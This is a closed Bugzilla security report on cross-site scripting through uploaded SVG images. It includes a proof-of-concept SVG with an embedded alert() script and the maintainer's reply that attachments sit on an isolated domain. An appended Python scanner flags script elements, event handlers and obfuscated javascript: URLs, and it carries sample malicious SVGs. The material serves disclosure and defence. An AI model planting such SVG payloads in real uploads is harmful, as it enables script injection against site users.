Closed Bug 1168638 Opened 9 years ago Closed 9 years ago

XSS vulnerability via SVG files

Categories

(Bugzilla :: bugzilla.org, defect)

defect
Not set
normal

RESOLVED DUPLICATE of bug 38862

People

(Reporter: yaaboukir, Unassigned)

Details

Attachments

(1 file)

Attached image PoC.svg (deleted)

Hi,

I am able to execute an XSS vulnerability by uploading an SVG image in which I injected a malicious JavaScript payload. The XSS is being executed in the context of bug1154535.bugzilla.mozilla.org.

Proof Of Concept :
When you open the attached image, the XSS will be triggered (No harmful payload).

Image code : 
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("XSSed by Yassine !");
   </script>
</svg>

Kind regards.

The attachment is on a separate domain name, so you cannot do much harm this way.
Group: bugzilla-security
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty-
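
An upload-side check that complements the separate-domain isolation mentioned in the reply, as an added example that is not part of the original bug or of Bugzilla's code. It scans an SVG for script-capable content using Python's standard expat parser; the function name, the element list and the two extra samples are assumptions made for this illustration.

```python
import xml.parsers.expat

# Elements that can run script or embed foreign documents (illustrative, not exhaustive).
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}

# The PoC from the report above, plus two samples constructed for this example.
POC_SVG = b"""<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert("XSSed by Yassine !");
   </script>
</svg>"""
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
   <polygon points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="x()">
   <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="java&#9;script:x()"/>
</svg>"""


def find_active_content(svg_bytes):
    """Return findings for an uploaded SVG; an empty list means nothing was flagged."""
    findings = []
    # Namespace-aware parsing reports names as "namespace-uri localname".
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def local(name):
        return name.rsplit(" ", 1)[-1]

    def start_element(name, attrs):
        tag = local(name)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element <{tag}>")
        for attr, value in attrs.items():
            attr = local(attr)
            # Browsers ignore tabs and newlines inside a URL scheme, so drop them first.
            url = "".join(ch for ch in value if ch > " ").lower()
            if attr.lower().startswith("on"):
                findings.append(f"event handler {attr} on <{tag}>")
            elif attr in ("href", "src") and url.startswith("javascript:"):
                findings.append(f"script URL in {attr} on <{tag}>")

    parser.StartElementHandler = start_element
    # Entities declared in a DTD can hide markup from this scan, so flag any DOCTYPE.
    parser.StartDoctypeDeclHandler = lambda *args: findings.append("DOCTYPE declaration")
    try:
        parser.Parse(svg_bytes, True)
    except xml.parsers.expat.ExpatError:
        findings.append("not well-formed XML")  # fail closed on unparseable input
    return findings
```

A non-empty result is a reason to reject the file or serve it as a download rather than inline; it is a screening step, not a full sanitizer.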